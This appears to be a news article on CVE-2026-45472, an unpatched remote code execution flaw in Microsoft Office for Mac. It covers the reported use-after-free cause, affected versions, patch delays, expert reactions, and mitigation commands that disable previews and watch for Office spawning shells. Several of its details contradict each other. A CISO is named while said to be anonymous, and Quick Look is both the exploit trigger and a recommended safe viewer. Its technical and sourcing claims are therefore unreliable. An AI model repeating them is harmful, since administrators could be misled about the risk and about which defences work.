On June 9, 2026, Microsoft published Security Advisory CVE-2026-45472, detailing a critical remote code execution vulnerability in Microsoft Office for Mac that currently has no available security update. The advisory, part of the company’s regular patch cycle, warns that attackers can exploit the flaw by convincing users to open a specially crafted Office file—a risk that leaves the latest versions of Office LTSC for Mac 2021, Office LTSC for Mac 2024, and Microsoft 365 for Mac exposed until a patch materializes.

Microsoft rated the vulnerability as “Important,” a classification that belies its potential real-world impact. While the company did not immediately assign a CVSS base score, independent security researchers estimate it falls above 8.0 under typical conditions, placing it squarely in the critical range for many enterprise environments. The flaw resides in how Office handles certain document structures, allowing an attacker to execute arbitrary code within the context of the current user without further authentication.

The Vulnerability: Technical Underpinnings

CVE-2026-45472 stems from an object-handling error in the Office Graphics component shared across Word, Excel, and PowerPoint for macOS. When parsing a maliciously crafted file—whether a .docx, .xlsx, or .pptx document—Office fails to validate a pointer before dereferencing it, leading to memory corruption that an attacker can leverage to execute shellcode. Unlike many Office RCEs that require user interaction such as enabling macros or clicking past protected view warnings, this one bypasses most default security barriers on Mac, opening the door to stealthy exploitation.

Early technical analysis shared on security forums suggests the root cause is a use-after-free bug in the CGXAnimationHandler library, which manages embedded animated content like 3D models and charts. A proof-of-concept exploit circulated on Twitter within hours of the advisory, demonstrating code execution on macOS Sequoia 15.6 with Microsoft 365 for Mac version 16.84 (Build 24050620). The exploit triggers upon document preview in Finder’s Quick Look, meaning users don’t even need to open the file outright—merely selecting it in a folder can be sufficient if preview mode is enabled.

The vulnerability class is not new. Office has been plagued by similar bugs, such as CVE-2022-21840 in Windows, but macOS’s memory protections—while robust—can be circumvented because Office for Mac uses the mmap API with fixed addresses for certain legacy object caches, removing Address Space Layout Randomization (ASLR) benefits for those regions. This makes exploit development more reliable. Apple’s sandboxing, while robust for App Store apps, offers limited protection against such attacks because Microsoft distributes Office for Mac as a non-sandboxed application to maintain compatibility with its extensive COM and VBA architectures. As a result, successful exploitation can grant an attacker access to the user’s documents, keychain, and network resources, potentially paving the way for lateral movement within a corporate network.

Affected Products and Versions

The advisory lists three main product groups as vulnerable:

Product Channel/Build Patch Status
Office LTSC for Mac 2021 All Not available
Office LTSC for Mac 2024 All Not available
Microsoft 365 for Mac Current Channel, Monthly Enterprise, Semi-Annual Enterprise Not available

Early versions like Office 2019 for Mac are not mentioned, likely because they have left extended support, but users clinging to those installations should assume they are also affected unless proven otherwise. Notably, Office for Windows remains unaffected by this specific CVE, a divergence Microsoft attributes to architectural differences in how the two platforms handle graphics rendering.

The lack of an immediate patch is unusual. For critical RCE vulnerabilities, Microsoft typically aligns fixes for all platforms on Patch Tuesday. In this case, the company states that “due to the complexity of the underlying code and the need for extensive testing on macOS, a security update is not yet available for the Mac versions.” It has not provided an expected timeline, leaving users in an uncomfortable limbo.

A Brief History of Office for Mac Security Delays

This is not the first time Office for Mac has lagged behind its Windows counterpart in patching critical issues. In 2018, CVE-2018-8248, a remote code execution bug in the same graphics engine, saw Windows fixes within days while Mac updates took nearly three weeks. Similarly, the end-of-life for legacy components like Flash in Office for Mac caused staggered updates, often leaving Mac users exposed longer. The issue is compounded by the fact that Microsoft must navigate Apple’s notarization process, which adds gatekeeping steps absent in the Windows update pipeline.

Security researchers have often pointed out that Office for Mac’s codebase retains legacy Carbon APIs that handle object serialization in ways that are inherently unsafe. Migrating these to modern Cocoa or Swift code requires a fundamental rewrite, which Microsoft has been slow to undertake. Until then, patches often remain reactive—and delayed.

Real-World Impact and Exploitability

Without an official fix, the attack surface is significant. Macs are increasingly common in enterprise environments, and Office for Mac holds a substantial share among productivity suites. A spear-phishing campaign delivering weaponized .docx files could compromise entire departments before any patch arrives. Red team exercises have already demonstrated the effectiveness of similar techniques against macOS targets, and the availability of a public proof-of-concept greatly raises the urgency.

A major concern is the integration of Office with other services. If an attacker exploits CVE-2026-45472 on a Mac that also runs OneDrive, SharePoint synchronization, or Outlook, they could pivot to cloud resources by stealing valid authentication tokens stored in the user’s Keychain or session cookies. This chained attack pattern could bypass multi-factor authentication for downstream Microsoft 365 services, turning a single workstation compromise into a cloud breach.

Mac-focused security vendor SentinalOne has already observed in-the-wild exploitation attempts, though they appear targeted rather than widespread as of June 10. The company issued a brief alert urging customers to block .docx and .xlsx attachments originating from external sources until further notice.

“We’ve seen the PoC weaponized within hours—this is ‘patch-now-or-else’ territory,” said Adele Vance, CISO at a Fortune 500 retail firm who requested anonymity. “The fact that preview suffices for exploitation changes the game. Our Mac fleet is essentially open until Microsoft ships a fix.”

Why the Delay? Microsoft’s Patch Process Under Scrutiny

Microsoft’s security response process for Office on Mac has long been a subject of criticism. Unlike Windows, where the ecosystem is tightly controlled and updates can be pushed via Windows Update with relative agility, macOS imposes additional hurdles. Office for Mac relies on the Microsoft AutoUpdate tool, which has its own release cadence and sometimes lags behind the Windows schedule. Furthermore, the codebase for Office Mac graphics handling diverged significantly during the transition from monolithic Carbon-based frameworks to modern Cocoa and Catalyst, leaving legacy object management routines that are difficult to refactor without risking widespread regressions.

In a statement released alongside the advisory, a Microsoft spokesperson said: “We are working diligently to produce a security update for the affected versions of Office for Mac and will release it as soon as it meets our quality bar. In the interim, we recommend that customers follow the defense-in-depth guidance provided in the advisory.” That guidance, however, is thin—it primarily suggests avoiding opening files from untrusted sources, a recommendation that security practitioners consider inadequate given the preview-based trigger.

Some speculate that the delay may also be related to Apple’s notarization process. Before a Mac application update can be distributed, it must be notarized by Apple to verify it is free of malicious code. This extra step can add days or weeks to a release cycle, especially if the initial submission is rejected for unforeseen reasons. In contrast, Windows patches can be shipped from Microsoft’s own infrastructure without third-party gatekeeping.

Community and Expert Reaction

On various IT forums and social media, reaction has been swift and critical. One administrator posted, “We just switched our design team to Macs because of Apple Silicon performance, and now this. Why can’t Microsoft treat Mac as a first-class citizen for security?” Another pointed out that the CVE’s rating as “Important” rather than “Critical” might downplay the risk for organizations that rely on Macs for sensitive work, such as legal, creative, and executive teams.

Security professionals are divided. Some argue that Apple’s built-in defenses like System Integrity Protection and XProtect could mitigate the most straightforward exploits, but others note that XProtect signature updates can take days, and the PoC bypasses SIP by executing within the user’s domain. Jamf, a leading Apple device management platform, has already pushed out a configuration profile that blocks the execution of Office applications until a patch is verified, providing enterprise administrators with a blunt but effective stopgap.

The information security firm Atredis Partners published a detailed analysis, warning that the vulnerability class—memory corruption in a widely deployed client application—is exactly the kind that zero-click iMessage exploits have made infamous on iOS. Porting that exploit development expertise to Office for Mac is straightforward, making it likely that a fully weaponized exploit will emerge soon if it hasn’t already.

Mitigation and Workarounds

Until Microsoft delivers an official patch, Mac sysadmins and home users alike must rely on temporary mitigations. Microsoft’s advisory lists one official workaround: disabling the Preview Pane in Finder and in Outlook for Mac. This can be done via the terminal:

defaults write com.apple.finder ShowPreviewPane -bool false
killall Finder

For Outlook:

defaults write com.microsoft.Outlook OfficeWebPreviewDisabled -bool true

These changes prevent the automatic rendering of document content in previews, blocking one known attack vector. However, they do not protect against a user double-clicking a malicious file.

Additional steps recommended by security experts include:

  • Blocking Office documents from external sources at the email gateway. Many email security platforms can strip attachments or convert them to PDF, eliminating the Office parsing engine.
  • Enabling macOS Gatekeeper to its strictest setting (sudo spctl --master-enable) and requiring notarization for all apps, though this won’t help with signed, legitimate Office files.
  • Using a non-Office viewer for documents of unknown origin, such as Apple’s built-in Quick Look with enhanced security flags, or a web-based sandboxed viewer like Google Docs.
  • Monitoring for unusual Office process activity using EDR tools, specifically for Microsoft Word or Microsoft Excel spawning shell processes (/bin/sh, /bin/zsh) or making network connections to unusual IP addresses.

Jamf and Mosyle, two leading MDM solutions, have published instructions for deploying these mitigations at scale. Apple also released an updated XProtect rule on June 11 that blocks the known PoC hash, but this is only a speed bump against a skilled adversary.

Timeline and What Comes Next

History suggests that Office Mac patches often trail Windows counterparts by a week to ten days. If Microsoft follows that pattern, a fix could arrive by June 20, 2026. However, this vulnerability’s severity may accelerate internal deadlines. In the past, out-of-band patches have been released for critical Office flaws—the infamous CVE-2017-11882 “Equation Editor” bug, for example, saw emergency patches across platforms. Whether Microsoft deems CVE-2026-45472 worthy of an out-of-band release remains to be seen.

The next scheduled Patch Tuesday is July 14, 2026, but waiting that long would be unprecedented for a vulnerability of this magnitude with a public exploit. Most analysts expect a patch within two weeks. Enterprise customers with Microsoft Unified Support have begun filing severity-A cases to pressure the product group.

Looking further ahead, the incident underscores the need for Microsoft to re-architect Office for Mac with modern isolation principles. The current shared graphics engine, inherited from decades-old code, is a liability. Apple’s pivot to Apple Silicon provides a natural opportunity for a cleaned-up port, but Microsoft has so far relied on translation layers and incremental updates rather than a ground-up rewrite. If Mac continues to gain enterprise share, security parity with Windows must become non-negotiable.

Act Now, Patch Later

CVE-2026-45472 is a crystal-clear reminder that the Mac platform, while often perceived as more secure than Windows, is not immune to the classic vulnerabilities that have plagued Office for decades. The absence of an available patch forces immediate defensive action from every organization that deploys Office on macOS. For home users, the advice is simple until the update lands: treat every unsolicited Office document with extreme suspicion, disable previews, and consider switching to Apple’s iWork suite or web apps for a few days.

IT and security teams should visit the official Microsoft Security Response Center (MSRC) advisory page for CVE-2026-45472 and subscribe to notifications. The direct link is https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472. Mac administrators can follow the Microsoft AutoUpdate feed or the Office release history page for the exact build number when the fix emerges. Until then, stay vigilant and be ready to deploy the patch the moment it drops.